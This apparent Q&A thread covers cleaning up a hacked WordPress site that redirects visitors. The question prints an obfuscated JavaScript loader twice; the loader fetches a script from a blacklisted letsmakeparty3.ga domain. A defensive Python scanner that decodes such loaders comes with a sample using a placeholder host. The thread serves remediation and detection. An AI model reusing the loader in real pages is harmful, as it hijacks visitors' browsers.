Dhilin Raju

Reputation: 31

How to solve WordPress redirection hack attacks?

My website https://spicecarts.in just now got hacked! It is redirecting to other sites! I checked with this tool https://sitecheck.sucuri.net/results/https/spicecarts.in and found the errors:

1. Known javascript malware: malware.injection?35.27

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,97,108,108,111,119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

Redirects to https://spicecarts.in/

2. This page includes a JavaScript/iframe from letsmakeparty3.ga that is blacklisted by Sucuri Labs, reason: injected script, see https://labs.sucuri.net/?blacklist=letsmakeparty3.ga

https://allow.letsmakeparty3.ga/request?Type=api&query=034/wp-content/plugins/super-progressive-web-apps/public/js/register-sw.js

3. In https://spicecarts.in/wp-includes/css/ malware found as below

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,97,108,108,111,119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

How to solve this!

Upvotes: 0

Views: 6186

Answers (3)

Lamri Djamal

Reputation: 291

Hi, I found and deleted the virus in the database.

Just search for the base64-encoded characters in the database, in the options table.

Decode any base64 information and delete it.


Upvotes: 0

Mel

Reputation: 943

First, calm down. My website has suffered the same SQL injection attack and here's how I solved it. Make sure to back up your database first.

  1. Go to your phpMyAdmin and open the wp_options table. Update the option_value of siteurl and home with your website's URL without / at the end, for example https://yourwebsite.com. After updating, you are now able to log in to your website.


  2. Log in to your website and delete the transient options. You can use the wp-optimize plugin to delete transient options like these:


  3. In conclusion, what you need to do is to clean your database. There are plugins that can do such cleaning. You may also search your database for letsmakeparty3 and remove these.


Upvotes: 5

Char

Reputation: 1

You will also want to be sure that any potential malware on the site is cleaned. You can either submit the site for cleaning to a professional service or try to do it yourself. As mentioned above, you will need to clean the DB. You will also need to check for infected files. If you have a clean version of your theme and plugin files stored in a backup or on your local machine, that could be a good place to start. Make sure everything on the site is updated (outdated plugins usually = vulnerability). If it's redirecting to letsmakeparty3, then it's worth checking to see if the MU plugin rms_unique_wp_mu_pl_fl_nm was added to your site. Cheers!

Upvotes: 0
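
One way to carry out the file check described in the answers, as an added example (not code from the question or from any answer): the script decodes every String.fromCharCode(...) call in a site's .js/.php/.html/.css files and reports decoded strings that are URLs, plus any file containing an indicator string such as letsmakeparty3. The function names, the suffix list and the bad.example sample are assumptions made for illustration.

```python
import re
import sys
from pathlib import Path

# String.fromCharCode(...) calls with decimal arguments, as in the question's loader.
CHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*(\d{1,7}(?:\s*,\s*\d{1,7})*)\s*\)")
SCAN_SUFFIXES = {".js", ".php", ".html", ".htm", ".css"}  # assumption: adjust per site

# Constructed sample in the style of that loader; bad.example is a placeholder host.
SAMPLE = (
    "var e=document.createElement(String.fromCharCode(115,99,114,105,112,116));"
    "e.src=String.fromCharCode("
    + ",".join(str(ord(c)) for c in "https://bad.example/l.js") + ");"
)

def decode_charcodes(text):
    """Return the decoded string for every String.fromCharCode(...) call in text."""
    decoded = []
    for match in CHARCODE_RE.finditer(text):
        codes = [int(n) for n in match.group(1).split(",")]
        if all(c <= 0x10FFFF for c in codes):  # skip values chr() would reject
            decoded.append("".join(chr(c) for c in codes))
    return decoded

def suspicious_strings(text, indicators=()):
    """Decoded strings that look like URLs or contain a known indicator."""
    hits = []
    for s in decode_charcodes(text):
        low = s.lower()
        is_url = low.startswith(("http://", "https://", "//"))
        if is_url or any(i.lower() in low for i in indicators):
            hits.append(s)
    return hits

def scan_tree(root, indicators=()):
    """Map each matching file under root to decoded URLs and plain-text indicator hits."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            text = path.read_text(encoding="utf-8", errors="replace")
            hits = suspicious_strings(text, indicators)
            hits += [i for i in indicators if i.lower() in text.lower()]
            if hits:
                findings[str(path)] = hits
    return findings

if __name__ == "__main__":
    for file, hits in scan_tree(sys.argv[1], sys.argv[2:]).items():
        print(file, hits)
```

Run it against a copy of the site files, for example `python scan_charcode.py ./site-backup letsmakeparty3` (the script file name is hypothetical), and compare flagged files with a clean copy of the same theme or plugin.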
